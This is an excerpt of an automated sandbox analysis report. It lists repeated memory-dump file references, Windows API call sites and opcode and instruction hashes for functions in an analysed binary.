                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: CloseFileHandleModuleNameOpenProcesslstrcpy
                                  • String ID:
                                  • API String ID: 4028989146-0
                                  • Opcode ID: 27b53dfd89c520ab3b39ecc330e818da854d59db8cc3d6bf5c69b002bd03873b
                                  • Instruction ID: 6cdf47ddede3b142a618b47006911d5eb94e26fc0ec3d9586ccc47a54e45f7c7
                                  • Opcode Fuzzy Hash: 27b53dfd89c520ab3b39ecc330e818da854d59db8cc3d6bf5c69b002bd03873b
                                  • Instruction Fuzzy Hash: 5CF0FCB0D016152BE7229B75AC4DBE676A8AF15304F0145A0FA49D7180DFB09CC4C790
                                  APIs
                                  • __getptd.LIBCMT ref: 00368FDD
                                    • Part of subcall function 003687FF: __amsg_exit.LIBCMT ref: 0036880F
                                  • __getptd.LIBCMT ref: 00368FF4
                                  • __amsg_exit.LIBCMT ref: 00369002
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00369026
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: 0cda065f8dbfc180fa99d3a0ba75d5c7c589d98529b80e0f997f0b1a445e7cda
                                  • Instruction ID: 2d07a9c2c56372a6484bb7d810b670d064db517f9c4155bb86275376ed5483b1
                                  • Opcode Fuzzy Hash: 0cda065f8dbfc180fa99d3a0ba75d5c7c589d98529b80e0f997f0b1a445e7cda
                                  • Instruction Fuzzy Hash: B7F0F0329087108BDB63BB78980775D37A46F04724F25C20AF004AF2DADF741840DA55
                                  APIs
                                  • lstrlen.KERNEL32(------,00345BEB), ref: 0036731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0036733F
                                  • lstrcat.KERNEL32(?,------), ref: 00367349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: e6b0fd0831c926114ca9bf35cc31ba57665766272af6a7a9fbb1c9f2cc36a10e
                                  • Instruction ID: 59234ad7fd3f9deb1abdcea9142ad0e5669bcee1849570337e6280a304cf8416
                                  • Opcode Fuzzy Hash: e6b0fd0831c926114ca9bf35cc31ba57665766272af6a7a9fbb1c9f2cc36a10e
                                  • Instruction Fuzzy Hash: 7DF05E785143029FCB259F25E84892BBAF4AF44704769882DE8DAC7318E730D880EFB1
                                  APIs
                                  • lstrlen.KERNEL32(------,00345BEB), ref: 0036731B
                                  • lstrcpy.KERNEL32(00000000), ref: 0036733F
                                  • lstrcat.KERNEL32(?,------), ref: 00367349
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcatlstrcpylstrlen
                                  • String ID: ------
                                  • API String ID: 3050337572-882505780
                                  • Opcode ID: 8c2b8efc148cfcd87e9f1c63701763aa1153329ad92ea0f47a5ee0d7bc09ca02
                                  • Instruction ID: 92fe88f8a6d31d21e123d3c77669c449ca600ca5a8891b06cdceb35775ef21f1
                                  • Opcode Fuzzy Hash: 8c2b8efc148cfcd87e9f1c63701763aa1153329ad92ea0f47a5ee0d7bc09ca02
                                  • Instruction Fuzzy Hash: 96F0C0785117029FDB259F35E84C927B6F9EF55705369882DA89AC7318E730D880EF60
                                  APIs
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                    • Part of subcall function 00341530: lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353422
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0035344B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353471
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00353497
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                  • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 0ac9ac11ad34081170e7b69893edbe0c2e7de392f076328d513b1969928365a7
                                  • Instruction ID: 71244d1a5dd2fc14a94416f114b4215695877be4970f6cff81f73fabce6f9096
                                  • Opcode Fuzzy Hash: 0ac9ac11ad34081170e7b69893edbe0c2e7de392f076328d513b1969928365a7
                                  • Instruction Fuzzy Hash: 8F121D70A012018FDB1ACF19D554F25B7E1AF4535AB1AC0ADE809DB3B1D772DD4ADB80
                                  APIs
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357C94
                                  • std::_Xinvalid_argument.LIBCPMT ref: 00357CAF
                                    • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D58
                                    • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D76
                                    • Part of subcall function 00357D40: std::_Xinvalid_argument.LIBCPMT ref: 00357D91
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Xinvalid_argumentstd::_
                                  • String ID: string too long
                                  • API String ID: 909987262-2556327735
                                  • Opcode ID: 2a7052a0c919f30f38361ed2d35869b4fa898b38e6bf3d4b8959c45945324523
                                  • Instruction ID: 14e07a1d145335e70627bf616d0ffe0d9a887244cd5aeea7eba2198db367afc0
                                  • Opcode Fuzzy Hash: 2a7052a0c919f30f38361ed2d35869b4fa898b38e6bf3d4b8959c45945324523
                                  • Instruction Fuzzy Hash: 983107723086148BD736DE6CF8C0D6AF3F9EF91762B21462AF8468B661C7719C4583A4
                                  APIs
                                  • GetProcessHeap.KERNEL32(00000008,?), ref: 00346F74
                                  • RtlAllocateHeap.NTDLL(00000000), ref: 00346F7B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Heap$AllocateProcess
                                  • String ID: @
                                  • API String ID: 1357844191-2766056989
                                  • Opcode ID: 781b66c4cf47b73e95adcdfd6bf3e835472f620f825c10252323edd3f674a142
                                  • Instruction ID: 94a91048f5ffd0187862ea4576de2fa79db86b31a054d9b9d062bdbf7b6446b5
                                  • Opcode Fuzzy Hash: 781b66c4cf47b73e95adcdfd6bf3e835472f620f825c10252323edd3f674a142
                                  • Instruction Fuzzy Hash: E0216DB06007019BEB218F20DC85BB673E8EB52704F454868E98ACF684E775F989CB61
                                  APIs
                                  • lstrcpy.KERNEL32(00000000,0036CFEC), ref: 0036244C
                                  • lstrlen.KERNEL32(00000000), ref: 003624E9
                                  • lstrcpy.KERNEL32(00000000,00000000), ref: 00362570
                                  • lstrlen.KERNEL32(00000000), ref: 00362577
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpylstrlen
                                  • String ID:
                                  • API String ID: 2001356338-0
                                  • Opcode ID: 15b729f529077d386d5eb46dde74f12bdf6756a017c5f7a573a0a6407d2ad214
                                  • Instruction ID: 328aca82ae8ace9643b9721fa536d022d89a3789faac9e051e73b28eee9088f7
                                  • Opcode Fuzzy Hash: 15b729f529077d386d5eb46dde74f12bdf6756a017c5f7a573a0a6407d2ad214
                                  • Instruction Fuzzy Hash: 3D8113B0E002059BDB12CF95DC44BAFBBB5EF85300F16C069E909AB385EB759D45CB94
                                  APIs
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000), ref: 0034162D
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000,?), ref: 0034164F
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000,?), ref: 00341671
                                    • Part of subcall function 00341610: lstrcpy.KERNEL32(00000000,?), ref: 00341693
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341557
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341579
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034159B
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003415FF
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: 12042e2e709536f19e906e5a2f7ae0564a27594221131d0f01bfa09f6cfcaab5
                                  • Instruction ID: e7c433a91a119da2ee28c42807b78fef3556dca41eb8b82d8ce732d0d70bb76d
                                  • Opcode Fuzzy Hash: 12042e2e709536f19e906e5a2f7ae0564a27594221131d0f01bfa09f6cfcaab5
                                  • Instruction Fuzzy Hash: A331D475A01F02AFC725DF3AD588952BBE5FF89300741492DA896CBB10DB34F861CB90
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 003615A1
                                  • lstrcpy.KERNEL32(00000000,?), ref: 003615D9
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361611
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00361649
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_340000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy
                                  • String ID:
                                  • API String ID: 3722407311-0
                                  • Opcode ID: a0aad73b00ebf559626d9dead3e02f8d06467dbd3d3c7369e57e8982f2491f46
                                  • Instruction ID: a7169b71016f9313189d3146718237413a341cb719cadcb9551d98634f8d8b4c
                                  • Opcode Fuzzy Hash: a0aad73b00ebf559626d9dead3e02f8d06467dbd3d3c7369e57e8982f2491f46
                                  • Instruction Fuzzy Hash: 8521FC74601B029FD726DF2AD854A17B7F5AF45700B49891CA897CBB44DB30F851CBA0
                                  APIs
                                  • lstrcpy.KERNEL32(00000000), ref: 0034162D
                                  • lstrcpy.KERNEL32(00000000,?), ref: 0034164F
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341671
                                  • lstrcpy.KERNEL32(00000000,?), ref: 00341693
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1425086991.0000000000341000.00000040.00000001.01000000.00000003.sdmp, Offset: 00340000, based on PE: true
                                   • Associated: 00000000.00000002.1425071124.0000000000340000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000377000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003CE000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003D6000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.00000000003EF000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425086991.0000000000578000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425250911.000000000058A000.00000004.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.000000000058C000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000718000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.00000000007F0000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000817000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000822000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425265677.0000000000830000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425528055.0000000000831000.00000080.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425647914.00000000009CB000.00000040.00000001.01000000.00000003.sdmp
                                   • Associated: 00000000.00000002.1425664538.00000000009CC000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
